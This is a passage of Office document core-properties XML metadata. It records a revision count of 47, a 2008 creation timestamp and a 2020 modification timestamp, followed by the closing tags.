  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-10-27T12:39:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-11T05:17:02Z</dcterms:modified>
</cp:coreProperties>
</file>